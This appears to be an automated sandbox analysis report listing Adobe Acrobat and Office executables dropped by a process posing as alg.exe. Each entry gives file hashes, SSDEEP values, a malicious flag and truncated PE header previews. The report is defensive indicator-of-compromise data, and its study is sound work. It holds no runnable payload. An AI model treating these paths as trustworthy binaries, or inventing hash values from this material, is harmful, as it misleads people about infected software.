SHA-256:	0DC2FC7E463A383587FCD5C102B47BEEBB805230F2F7942A6CA2085232A21338
SHA-512:	7D3C1F10AFCCF27E0113BCCB2E631EE289E0F5306B1EBB3326654583D1BF354D82473B5BCE39063387E31E0CC264051BFC780B158E54C8E8D8E2291C32F7FCE3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....S.^... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1157120
Entropy (8bit):	5.041482427027655
Encrypted:	false
SSDEEP:	12288:2GXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2GsqjnhMgeiCl7G0nehbGZpbD
MD5:	9FF9EFF3852375D1819090B8DA32E397
SHA1:	B1485BA36DBAE0A7B423EDB8936095E26B821294
SHA-256:	66A6591D00A59C4A844A8F4D7F828320F84BF2FE6FF640B3AE96CE994B31F117
SHA-512:	77D68AC33865ACCB6363FEDCBD0183763B2D451F6CABDE457E3C5E3A612D7BAAB62A99D0F57DA018CDC1BD5BE81E67218D9C11FA7902BC561516D931E1A97D9F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.596675240047579
Encrypted:	false
SSDEEP:	98304:ib+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKtD527BWG:EnPgTHIwZoRBk9DdhSUEVIXgKtVQBWG
MD5:	2F668FD0BC02C14B7762C315C3082B52
SHA1:	6CC86DFBF2A24BBCA6268DD63FC5501A552FAFFA
SHA-256:	2184C814499F4DFF3B8113724461C080BBDEFD9D86F796CB93F4108D07F2C1A0
SHA-512:	7BE1B1641B3327C83CA9F802CFFD5B87D94AAC22F1A0B7A18C265BCF5B32FA99EA63CFD30ADE09D05BDA33536146A1E30557C25539B1EA807552412428B99905
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................P.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1322496
Entropy (8bit):	5.281811943664579
Encrypted:	false
SSDEEP:	24576:xg5FvCPusZsqjnhMgeiCl7G0nehbGZpbD:GfteDmg27RnWGj
MD5:	B3B9501289BB10791AA37639F6D0454D
SHA1:	836707E9418EE494CD0E01BD3AAD860371949588
SHA-256:	E14022D5299F1D15A51AA547894479E5D057002FE95193EA8C118E9153EFFAD2
SHA-512:	B4D443D0A05D45AB16D8BAE7517E466550DCCCEE40D89F3FBCEE371576490F9B176BFA7F9F94DDABB146D74E24A7C5CFEBA34B08F215C4B4921A0BCA4D9D3AA8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.20887030468731
Encrypted:	false
SSDEEP:	24576:njKTIsAjFuvtIfmFthMaT5U8aChaeuzsqjnhMgeiCl7G0nehbGZpbD:njIMmPh7TT792Dmg27RnWGj
MD5:	1BE1F9F957BD93F9851D332DF35DC872
SHA1:	9E0737A0AF4D63E2BE108D800072D652BCBE9E0F
SHA-256:	6851BEB80C227006211C8C84747E3DE9398CDB797056C9C4A81F20BF7E02BD03
SHA-512:	C5286D0180FA737163FF8393967406755E5463F1AC0530652A7C8F6117A657D73A210E7C9CDFB636DCC6DA1771CCCC5819F648D16F93F8E7072B6C0145B473D1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1515520
Entropy (8bit):	5.411758929064032
Encrypted:	false
SSDEEP:	24576:RGqVwCto1Gm5WgHsqjnhMgeiCl7G0nehbGZpbD:wZ1GmUwDmg27RnWGj
MD5:	E40FD6D130FD6C70B47AC0788A32C67B
SHA1:	1F45746BCC2F89E06F65EBA6D6B8DA2F5BE9ECD9
SHA-256:	586F0E06341E9925A7C7427BB26D4F8ACB433B6B2F16400A63B1E2D8CBEACAF7
SHA-512:	C134D23258B172ACFFB7243C54AE881C25F86E5F894D1624BB06C7D810C5AA7D55B171685D190B594960AF0870A01468CDB107B99D9C159FF072246BD21D5F6D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1253376
Entropy (8bit):	5.157400275476683
Encrypted:	false
SSDEEP:	12288:OWBWTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OWBWTsqjnhMgeiCl7G0nehbGZpbD
MD5:	A63248797AD8B250FD7E11CDB2ECB36A
SHA1:	7A225E8A99C236B9335CECFB5A437113C5A592C6
SHA-256:	90E346089AB695BECA3B36E56543CD7A8CF92D4B10ACC71DE0AC3FCD3819977C
SHA-512:	47D1A11AE81F377CADDAC3D159164E3191FAC71F49DECC4C18ABC1EB231D94BFE17A13078B91D6862E6C902DBBDC919DB62764FCD619A99DD92D824E58554B4A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`......M..... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.228473489541026
Encrypted:	false
SSDEEP:	24576:+f9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0wsqjnhMgeiCl7G0nehbGZpbD:++GtCi27mVTyT+a0sDmg27RnWGj
MD5:	1CD64FCCF9A9E3956FBFF157C08E1D2E
SHA1:	6018E88301BA6446182F65A2BDCDCE0E2079C730
SHA-256:	E4109A02215ADFD593D038C49C6AAD43FEC829924976C91C4721EC2DE575BE85
SHA-512:	3BC12DEC01DFA1546D6C072B6955EC91BD4B5F309FABA538CF4A5CCD65918117BBBDA0ECEEA3B0E42B3715B0E8CD88DF238CF9B4404556B42BD416D0A791C6DB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.649654151448438
Encrypted:	false
SSDEEP:	49152:mU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYTDmg27RnWGj:b2NfHOIK5Ns6qR9BD527BWG
MD5:	C837167AC535BD933FF765AA53CFD9DA
SHA1:	A177D313B3CE5E4100F4501BC06D8DD2AFCE0ADE
SHA-256:	862212A441A77EF7B2F185ED4A019C9946C59B72AC8FF48B28B9F074D19B057C
SHA-512:	0592CADBA621E8CF22474B0E0918859074A591A750BED404CEFC3DAC4F1227449021767F7D9B32A6388908AE8009ECFE27DB8B33A400CA87758711EA49A8F5E5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......t0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1588224
Entropy (8bit):	5.531904467143173
Encrypted:	false
SSDEEP:	24576:XkcWTUQcydXsqjnhMgeiCl7G0nehbGZpbD:XhKU0Dmg27RnWGj
MD5:	EC3F283E2047793F47B6FE5140BBE5AC
SHA1:	9DD7A63054068E71B3596AA7DE99AC881E835841
SHA-256:	675EE0DB28DF74A3366FB624B2BEECFDD66BD86D2DE847BC66B6173C705095A1
SHA-512:	A2089968AC2ECA8498CF2F366562FFDFBC8209CEDD9B54C5E9A78BD5FC167D9D2D33895B4FFE605D33192B6E2A763AC09896D4A873FA0F5ED2A5DB11F4246FFD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................j..... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1338368
Entropy (8bit):	5.352660377074325
Encrypted:	false
SSDEEP:	12288:0fY+FUBgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:0A+qBgsqjnhMgeiCl7G0nehbGZpbD
MD5:	BBACCD9D3B0CBA3A473F5BED6FD14FC7
SHA1:	6D8D48A61C0641A823001ACB6DE113B0D4556AA2
SHA-256:	5275B1A5A122C9EEC3C5D59F417CEA0F87627FD32BAC9DEBD8487662821F3F26
SHA-512:	21ACB6180759495D486973BCF6C4EDA4DA1D3E8C9CF973586A494DB7E3F5912B0D53053B368DB766041D69DF7EE9A1403181F4D6E80248F1E31B35A6DDFE275D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1143296
Entropy (8bit):	5.022664863103032
Encrypted:	false
SSDEEP:	12288:BXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BsqjnhMgeiCl7G0nehbGZpbD
MD5:	36DA4922725DF3DAE983161FACDD2316
SHA1:	C49322F4BD07902830D9821CF4E97D2F586255A6
SHA-256:	4A2790D8A2523509F0A2079CA6527E4F5C73AAC7DF8DC32C3564CDE7DB0FA7C2
SHA-512:	C58E2CBB186D4D1AB0DA853BC5B78E7EF563E4948C4CC02C91C8F942A4D4730074A34E0EF3CCB97E3F3EE5CD48299BD2CDB8E943DF1F7DCEA56D2982A9A63BFA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1161728
Entropy (8bit):	5.047154018053149
Encrypted:	false
SSDEEP:	12288:pEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:OsqjnhMgeiCl7G0nehbGZpbD
MD5:	7A87DCF8F68352288F5FD77DF3CC33D2
SHA1:	53457756A095B1FEF415E67DE19BA3118FA620BB
SHA-256:	FD937687245BCE9DE3A8EAC34AA780D1EC87D3F43C04FE779C5B041335729DD9
SHA-512:	3F9787C89724D5278EF9114B26F0CD400DCBAEFDC8C43E54E35910629EA63D35D9345F44B63F829DEF6F801090856BCE856D5E040C9117996E284942702D1E2A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499777196819358
Encrypted:	false
SSDEEP:	49152:ZtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755dDmg27RN:ZjEIa4HIEWOc5zD527BWG
MD5:	D394A5406776B898981D85C98BABFA6F
SHA1:	41FF762C520222E1A6A45B780966EB1674C9B62C
SHA-256:	BBEE9FF95B81EF7F4C8ACE1EDE91975242B7DA3B86E1A0B6B22157CA62A9874A
SHA-512:	EB97BA10324AE3E5129502B1E1FD97AEA92E04F3DDB37803B1C665C1CE2670749AC412C83EB52B097C322CC9BE94291ED32A775928AAD71391F6EBFAC16A07FB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.9993672823538775
Encrypted:	true
SSDEEP:	1572864:SQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:JXhwMhe6AABPiQwF6xQ22R
MD5:	4A389459380D842F009F7B26CDB1AEF4
SHA1:	1B93810A14462F390C8F72D53D7017A6A1C1B86D
SHA-256:	87593358A347C3727CC46E83BF3EB4BE55183D02651690179AED4E7295C1670F
SHA-512:	03F8A7F6E0FD8913024F1B2DBAAE33B6C3FE61FED06E9D7B6F7CA660E7F9EE4DA823BE8890EDE69E7A1473F3C51CF0F6CFCCB6E0CBEDEE2DBBE5C6B6E37D66B0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0........... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1230336
Entropy (8bit):	5.185592698744609
Encrypted:	false
SSDEEP:	12288:bejVWYUAEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yjkY7EsqjnhMgeiCl7G0nehbGZpbD
MD5:	E44D7E55D5DB3D3069B376249BF8BDD5
SHA1:	7765F38DF329D6D2EF45A1AB64892DEAAD30F4A4
SHA-256:	EE178CC94B25BF08B1B4F5FE2BC662B0C342DC5779926EF7DF1B73EEF2D2C8BE
SHA-512:	FC43EADDE7054ADE27D8E3C085E011631907750BD492FBF020CD487408E6E55D6759C6C970103A8EC8678CCCF9A1F8ECD12C02C1CAF49194E6170DB1E75BC249
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1384960
Entropy (8bit):	5.3777909600717315
Encrypted:	false
SSDEEP:	24576:RxwSJhkrmZs4sqjnhMgeiCl7G0nehbGZpbD:Ry+krKskDmg27RnWGj
MD5:	42B7F7DDD5E0DB15BC4FD1D2581778D1
SHA1:	9A05646AAE07B4E2686BCFA3215AA1B03F2890F8
SHA-256:	205859AE9D776E44769D873481B423F6CEC56861815796DD57E2B3FD1069FC0D
SHA-512:	8A31AF659A7A646C0DA35BC6496D85A65C8F9F983155EB06E340CF2573DA4CA520F7C3666BAA1F63C7C73FB9E8C4ACAF02DE2BD7C898C2E68B45EFFB4E6CF5EB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1649152
Entropy (8bit):	5.632710450103392
Encrypted:	false
SSDEEP:	24576:9HQJLIRgvsnNlsqjnhMgeiCl7G0nehbGZpbD:9HQJL34ZDmg27RnWGj
MD5:	A13EEDCB858DAE4C3BE39C6046463355
SHA1:	6EA4BA2D8D59AC7EBF26D288B3833E070E0F7AD3
SHA-256:	1DAE8A709FF34B7BBA297BF852B49955B0B1CA23E32CF54CD42F904067B7A4E9
SHA-512:	A0AF14577364AD08875C87C648B9586B6BEECA8CD45DD14FF3FFB8469B62AE6D2ED459F92C2F701B31716144033B373BDD6CEE470D23E5D94B2BCDC9C91841B0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................-:.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.4509666863461055
Encrypted:	false
SSDEEP:	49152:iUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ks:tWmXL6DEC7dRpKuDQbgCD527BWG
MD5:	EE025AB093A6B7B9122861EAD86F5B96
SHA1:	C8DB9637CF6404F64FE1C2CF0DC556AB9E9548AE
SHA-256:	957B467A5E5FBD2C0A2FAE3489EBCF8942B4AC1D58286C899161ED41497BD0CA
SHA-512:	92ADBBC5742B5486BF7E75EFD34113D2B25FC411B328E9715B1B75A314D2C3F71AB9699429FFFDDDE3C274EA351E53BE62FB61B9A2AF946DD2103441EE4B0860
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....<.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.972781063263288
Encrypted:	false
SSDEEP:	98304:3rZ23AbsK6Ro022JjL2WEiVqJZ9D527BWG:7JADmmxL2WEoCZ9VQBWG
MD5:	3DF099FCE92E246EB523BE381646069E
SHA1:	C4FBEA56FF85D005AFCAB7D8F85D65E06C97FDDC
SHA-256:	3A9928AD9E025E23A6C54979989D30C38C782845163BCE0575F1DAAEE61138FC
SHA-512:	7186BC6F51FC412FFDEFC9AEDE92398D21C0A5EDC510715DEA55301356FF914EBF0E1C20E26E4CF17AB492115C4959198BEFCAA5B6C7EA80B161E0236383F48A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......Y0.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.204893336800341
Encrypted:	false
SSDEEP:	24576:qfrYY42wd7hlOw9fpkEE64osqjnhMgeiCl7G0nehbGZpbD:Tz9xrSUDmg27RnWGj
MD5:	4285BE78CC9F52D287A2E38D8AC193CF
SHA1:	B13789E5C98F3E37F55A7845CD041944D6993933
SHA-256:	E1EF2289B137BDF7125B74F3F9C0C86D489D826796AC559C6114BA42C374E533
SHA-512:	1E9476E7A651965433D670F2CC67860CFF1A235BB8FE6239E2B9ECE0535322C47263A67CC2A1F11D1EECF35B9AAA7194A568EFE8F5AA55F492D94310796A30D3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Download File

